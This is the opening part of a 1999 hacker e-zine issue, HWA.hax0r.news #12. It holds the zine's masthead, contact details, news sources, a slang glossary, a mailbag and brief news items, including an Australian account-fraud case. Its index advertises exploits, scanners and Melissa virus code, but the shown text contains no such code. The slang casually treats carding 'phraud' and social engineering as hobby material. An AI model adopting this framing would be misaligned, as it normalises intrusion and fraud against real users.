HWA.hax0r.news #12 HTML/Text Version

Cubesoft, our new home.
Canc0n99 411 be there or be square

HWA is sponsored by Cubesoft communications www.csoft.net

 [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                      <=-[ HWA.hax0r.news ]-=>                          =
==========================================================================
  [=HWA'99=]                         Number 12 Volume 1 1999 April 1st 99
==========================================================================

** ISSUE 13 will be back to standard text format, htmlizing this file is too much work and bloats up the issue too much, if anyone wants to convert the texts to html though feel free to do so, and credit yourself for the work done as it takes some time to get all the links and make sure demo html is viewable in online versions..... - Ed

010010 0101010101 01010101 0101010101010 010101 010101 010101 01010101 010101 01010101 010101 010101010 0010101010 01010100101010 0101010101 01010101010101

Note that some stuff may not display correctly as I did not fully convert all the text contained in this file to html, it is recommended you read this file in standard text mode...

=------------------------------------------------------------------------=

"If your hacker admits to having been wrong, don't demand an apology; so far as the hacker is concerned, admitting to being wrong is an apology,"

 - from http://www.plethora.net/~seebs/faqs/hacker.html
   see sideline, 'proper care and feeding of your hacker'

=------------------------------------------------------------------------=

Synopsis
---------

The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so.

It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
                  Welcome to HWA.hax0r.news ... #12
=-----------------------------------------------------------------------=

*******************************************************************
***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
***                                                             ***
*** please join to discuss or impart news on techno/phac scene  ***
*** stuff or just to hang out ... someone is usually around 24/7***
***                                                             ***
*** Note that the channel isn't there to entertain you its for  ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #wierdwigs or something... ***
*** we're not #chatzone or #hack                                ***
***                                                             ***
*******************************************************************

=-------------------------------------------------------------------------=
  Issue #12
=--------------------------------------------------------------------------=

[ INDEX ]
=--------------------------------------------------------------------------=
  Key     Content
=--------------------------------------------------------------------------=

  00.0  .. COPYRIGHTS ......................................................
  00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
  00.2  .. SOURCES .........................................................
  00.3  .. THIS IS WHO WE ARE ..............................................
  00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
  00.5  .. THE HWA_FAQ V1.0 ................................................

  01.0  .. GREETS ..........................................................
  01.1  .. Last minute stuff, rumours, newsbytes ...........................
  01.2  .. Mailbag .........................................................
  02.0  .. From the editor..................................................
  03.0  .. Aussie faces 12months jail time .................................
  04.0  .. Mitnick update, another year in jail?............................
  04.1  .. The Bumper Sticker Stays.........................................
  04.2  .. Mitnick's Judgment Day at Hand...................................
  04.3  .. Why We Still Have to Free Kevin Mitnick..........................
  04.4  .. Mitnick gets 46 months...........................................
  05.0  .. Sesquipedalian.c 0 length connection resetting exploit...........
  06.0  .. Yet more MSIE5 vulnerabilities...................................
  07.0  .. QuickHacks and tips from ManicX..................................
  08.0  .. NT4 index server 2.0 vulnerabilities.............................
  09.0  .. Yahoo news ticker has plaintext passwords in config files........
  10.0  .. Defacing websites? read this from bufferoverflow/attrition.......
  11.0  .. Security analysis of Satellite command uplinks...................
  12.0  .. Melissa Pr0n virus makes it hard for Microsoft users.............
  12.1  .. The Melissa macro virus code.....................................
  12.2  .. PAPA, a Melissa variant targets specific people with ping fluds..
  12.3  .. PAPA B and the MadCow variants of Melissa already spreading......
  12.4  .. April 1st Melissa virus creator apprehended......................
  13.0  .. [ISN] A hacker's worst nightmare ................................
  13.1  .. How bad is Pentium III privacy threat?...........................
  14.0  .. ICQ99 Bug, erh feature turns your icq into a DoSable web server..
  15.0  .. Russian crackers takeout whitehouse.gov?.........................
  16.0  .. New Excel macro virus can bypass protections.....................
  17.0  .. xfree86 SUSE exploit.............................................
  18.0  .. Proper feeding and caring of your new hacker ....................
  19.0  .. Unix wardialer from w00w00 security..............................
  20.0  .. Australia gears up security for Olympics ........................
  21.0  .. NetBSD security advisories: umapfs ..............................
  21.1  .. NetBSD noexec mount flag advisory ...............................
  22.0  .. Checkpoint releases new DHCP based user 'mapping' technology.....
  23.0  .. SPAWAR a navy site for the security conscious...go FISH..........
  24.0  .. A Portscan detector..............................................
  25.0  .. Port 21 (FTP) Control port vulnerability scanner.................
  26.0  .. WuFTPd scanner...................................................
  27.0  .. The Wu-FTPd exploit and patch thread ............................
  28.0  .. Another Wu-FTPd exploit (wh0a.c).................................
  29.0  .. Netscape 4.51 allows url sniffing exploit and patch.............
  30.0  .. X11R6 rewt compromise exploit....................................
  31.0  .. Yet another wu-ftpd scanner by 03m0s1s...........................
  32.0  .. RedHat Linux security vulnerabilities list from redhat...........
  33.0  .. The Suburbanization of Slashdot by Pasty Drone...................
  34.0  .. Canada Rolls into Fiscal 2000....................................
  35.0  .. More exploits from the ADM crew .................................

=--------------------------------------------------------------------------=
  Special Sections.
  Civil disobedience and hacktivism, hacking contests
=--------------------------------------------------------------------------=

  SP.00 .. Intro: That Wild Wild Cyberfrontier..............................
  SP.01 .. Article 1:"Electronic Civil Disobedience and.....................
           ...........................the World Wide Web of Hacktivism:"....
  SP.02 .. Article 2:"Digital Zapatismo"....................................
           .................................................................
  SP.C1 .. The Phallusi of cracking contests................................
  SP.C2 .. Hacker challenges: Boon or Bane by Gene Spafford.................

=--------------------------------------------------------------------------=

  AD.S   .. Post your site ads or etc here, if you can offer something in return
            thats tres cool, if not we'll consider ur ad anyways so send it in.
  ..........................................................................
  HA.HA  .. Humour and puzzles ............................................
  HOW.TO .. New section: "How to hack" by our illustrious editor part 3.....
  SITE.1 .. Featured site, .................................................
  RAW.1  .. We remember Autonet'86..........................................
  H.W    .. Hacked Websites ..............................................
  A.0    .. APPENDICES......................................................
  A.1    .. PHACVW linx and references......................................

=--------------------------------------------------------------------------=

@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD

Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks.

Send all goodies to:

    HWA NEWS
    P.O BOX 44118
    370 MAIN ST. NORTH
    BRAMPTON, ONTARIO
    CANADA
    L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~  reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof.

If you still can't think of anything you're probably not that interesting a person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA

00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed.

HiR:Hackers Information Report... http://axon.jccc.net/hir/
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc................. http://www.cultdeadcow.com/
News site (HNN) ................. http://www.hackernews.com/
Help Net Security................ http://net-security.org/
News,Advisories,++ .............. http://www.l0pht.com/
NewsTrolls (HNN)................. http://www.newstrolls.com/
News + Exploit archive .......... http://www.rootshell.com/beta/news.html
CuD ............................. http://www.soci.niu.edu/~cudigest
News site+....................... http://www.zdnet.com/
News site+....................... http://www.gammaforce.org/
News site+....................... http://www.projectgamma.com/

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ...

* Yes demoniz is now officially retired, if you go to that site though the Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will also be hosting a webboard as soon as that site comes online perhaps you can visit it and check us out if I can get some decent wwwboard code running I don't really want to write my own, another alternative being considered is a telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=cracker
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.

http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://www.l0pht.com/cyberul.html
http://www.hackernews.com/archive.html?122998.html
http://ech0.cjb.net ech0 Security
http://net-security.org Net Security
...

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box.

- Ed

Mailing List Subscription Info   (Far from complete)         Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin. To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks.

Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter.

I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list.
Please follow the below guidelines on what kind of information should be posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria.

Remember: YOYOW.

You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.

For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin)

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                            ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed

Subscribe: mail majordomo@repsec.com with "subscribe isn".

@HWA

00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black

Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ATTENTION: All foreign correspondants please check in or be removed by next issue I need your current emails since contact info was recently lost in a HD mishap and i'm not carrying any deadweight. Plus we need more people sending in info, my apologies for not getting back to you if you sent in January I lost it, please resend.
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland

And unofficially yet contributing too much to ignore ;)

Spikeman .........................: World media

Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed

http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site

*******************************************************************
***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...

@HWA

00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions.

@HWA - see EoA ;-)

!= - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..)

AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one??

*CC - 1 - Credit Card (as in phraud)
      2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC - Chaos Computer Club (Germany)

*CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer
           2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC - End of Commentary

EoA - End of Article or more commonly @HWA

EoF - End of file

EoD - End of diatribe (AOL'ers: look it up)

FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;)

du0d - a small furry animal that scurries over keyboards causing people to type wierd crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used.

*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?'
         2 - A tool for cutting sheet metal.

HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;&

HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI- Missing on/from IRC

NFC - Depends on context: No Further Comment or No Fucking Comment

NFR - Network Flight Recorder (Do a websearch) see 0wn3d

NFW - No fuckin'way

*0WN3D - You are cracked and owned by an elite entity see pheer

*OFCS - Oh for christ's sakes

PHACV - And variations of same
        Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
        Alternates: H - hacking, hacktivist
                    C - Cracking
                    C - Cracking
                    V - Virus
                    W - Warfare
                    CT - Cyber Terrorism

*PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d

*RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass.

TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA - To Be Arranged/To Be Announced also 2ba

TFS - Tough fucking shit.

*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten"
        2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf - what the fuck

*ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway.
* all the people who sent in cool emails and support FProphet Pyra Pasty Drone TwstdPair TheDuece _NeM_ D----Y RTFM99 Kevin Mitnick (watch yer back) ypwitch kimmie vexxation hunchback mack sAs72 Spikeman and the #innerpulse, #hns crew and some inhabitants of #leetchans .... although I use the term 'leet loosely these days, ;) kewl sites: + http://www.l0pht.com/ + http://www.2600.com/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ Y2K: Qantas prepared to cancel flights The Y2K problem has proven too much for Australian airline Qantas, which has announced it may have to cancel flights. In a statement to the Australian Stock Exchange (ASX), the airline said it may reduce the number of flights on some domestic and international routes. "Qantas will only flyf it is safe to do so," its report stated. Qantas said it had checked with the manufacturers of its aircraft, which advised "that there are no safety or airworthiness issues relating to the year 2000 compliance of their aircraft". On this basis, the airline said it was satisfied that its business was "unlikely to be significantly disrupted". However, Qantas said services provided by "certain airports and air space authorities" were not compliant, and for this reason contingency plans were being developed. Want the full story? 
It's at http://newswire.com.au/9903/qy2k.htm ++ School Net filter software bans Bible A Net filtering system used by NSW state schools has been found to inaccurately block certain Web sites, according to online civil liberties group Electronic Frontiers Australia (EFA). Citing a recent report by the US body Censorware Project, EFA said the SmartFilter product used by schools had "problems". The report 'Censored Internet Access in Utah Public Schools and Libraries' found SmartFilter blocked sites featuring all of Shakespeare's plays, the Koran, the 'Adventures of Sherlock Holmes' and a number of safe-sex and AIDS prevention sites, to name just a few. Danny Yee of EFA said SmartFilter's claim that all blocked sites were checked by people was false. http://newswire.com.au/9903/netfilt.htm ++ AOL and Sun to ship in early 2000 AOL and Sun executives have revealed plans for their first jointly developed products. The products, to be shipped early next year, will be available for most major platforms including Linux and Windows NT, and will be sold through a dedicated sales force of more than 500 people. AOL and Sun have also announced they will continue to maintain support for their existing software lines. Details are still unclear about how Sun and AOL/Netscape will develop a multiplatform ecommerce solution, and what form the product will take. http://newswire.com.au/9903/aosun.htm ++ AMAZON TO DO AUCTIONS (BUS. 7:40 am) http://www.wired.com/news/news/email/explode-infobeat/business/story/18788.html The book and music seller plans to take on eBay, OnSale.... Also: A green energy company goes online, announces IPO.... Disney's Blast rejoins the family.... China likes CDMA.... Covad extends DSL nationwide for small businesses.... And ZiaSun says it will take Web-based email everywhere and anywhere. ++ WHEN SECRECY STOPS SCIENCE (TECH. 
3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/18740.html

Yes, it's bad to share the recipe for a really big bomb. But scientific secrecy can go too far. An MIT colloquium tries to strike a balance. By Chris Oakes.

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

++ STATES SEEK OS SURRENDER (POL. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/politics/story/18781.html

Nineteen states that have accused Microsoft of antitrust violations want to force the company to auction off its Windows operating system. There's still no hint of what the feds want.

Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Yes we really do get a pile of mail in case you were wondering ;-0 here's a sampling of some of the mail we get here, the more interesting ones are included and of course we had to get in the plugs for the zine coz we love to receive those too *G* - Ed

Delivered-To: dok-cruciphux@dok.org
From: "liquid phire"
Subject: the unknown netizen
Date: Thu, 25 Mar 1999 15:15:34 PST

the unknown netizen

we are not all sinless, our ethics do not save us from damnation. we are close to gods, but our divinity is tainted with blood. we are not perfect and our mistakes do not go unnoticed. but we are one. it is not one cry that sends a shiver up the spine of every government with something to hide, it is the shouts of a thousand warriors. it is not a few that are imprisoned, it is us all that wear chains. it is not one tear that is shed, it is an ocean of sorrow that drowns everything in its wake. we are of one mind and we never forget. we are of one body, intertwined electricity, wires and chips. we have but one vision, a world in which rights need not be fought for. as one we fight. as one we will see a new world. as one we are the faceless, the names that will never be lost to time.

phiregod
liquidphire@hotmail.com

please excuse all errors in grammar/spelling.

Get Your Private, Free Email at http://www.hotmail.com

-=- -=-

Delivered-To: dok-cruciphux@dok.org
From: "John Doe"
To: cruciphux@dok.org
Subject: Book
Date: Sat, 27 Mar 1999 05:46:08 PST
Mime-Version: 1.0
Content-type: text/plain

Dear Editor,

I am currently in the process of writing a book looking at the dawn of hacking through to where it is now and on to the future. This book will not be containing any comments designed to inflame the current public perception of hackers, it has been designed to shatter the myths. To do this though, I am in need of some help. I need people to point me in the right direction. I shall also be entering comments from a few hackers if they will let me.

One chapter in the book seems to have gotten the interest of a lot of hackers. This chapter is about profiles of hackers. Basically, I write out these profiles without their nicks, names or anything to identify them and show what a 'typical hacker' is if there indeed is one.

If you could help me out by putting an article in your net magazine requesting aid for me or by talking to other hackers that are more 'leet' than others so that I can get their opinions. So far, I have spoken to very few people and their talents seem to be more in their head than actually physically used.

Any help would be greatly appreciated.

Yours Sincerely
XXXXXXXXXXXX

Get Your Private, Free Email at http://www.hotmail.com

Send responses to this to me directly for forwarding to the writer cruciphux@dok.org thank you.

================================================================

@HWA

02.0 From the editor.
     ~~~~~~~~~~~~~~~~

#include
#include
#include

main()
{
 printf ("Read commented source!\n\n");

 /*well i tried out an idea with html and it doesn't agree with me
  *too much double text is created and its a damn load more work to
  *put together an issue that is html and text readable so we'll be
  *sticking to text for now.
  *
  *Perhaps someone will volunteer time to convert an issue or two to
  *html or sometime in the future when I have more spare time I may
  *be able to make html versions, meanwhile ... have fun ... - Cruci
  *
  */
 printf ("EoF.\n");
}

Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to, private mail to cruciphux@dok.org

danke.

C*:.

@HWA

03.0 Aussie man faces 12 months in jail
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Perth 'passwords' man appears in court
Roulla Yiacoumi

A Perth man charged with 37 counts of unlawfully operating a computer system has appeared in court. Christopher Thomas Daniels, 20, did not enter a plea and requested legal advice before his next appearance on April 13.

It was alleged Daniels had passwords to 350 Internet accounts, but used just 37 to fraudulently gain $50 worth of Net access (see story). It is believed he was given the account details by a juvenile. Users were not aware their accounts had been compromised; the ISP noticed inconsistencies and contacted police.

Detective Senior Constable Mike Wheeler from the WA major fraud squad said people gaining access to Net passwords was a widespread problem, not limited to this particular ISP. The accounts in this case were all with one ISP, Vianet in WA. Vianet managing director Tony Broughton was not available for comment this afternoon.

22/03/99 15:51

Net fraud: Aussie man charged
Roulla Yiacoumi

A 20-year old Perth man is facing 12 months in jail over Internet fraud amounting to just $50 worth of Net access. Christopher Thomas Daniels of Cannington has been charged by the Western Australian major fraud squad for accessing other people's Internet accounts. He faces 37 counts of unlawfully operating a computer system.

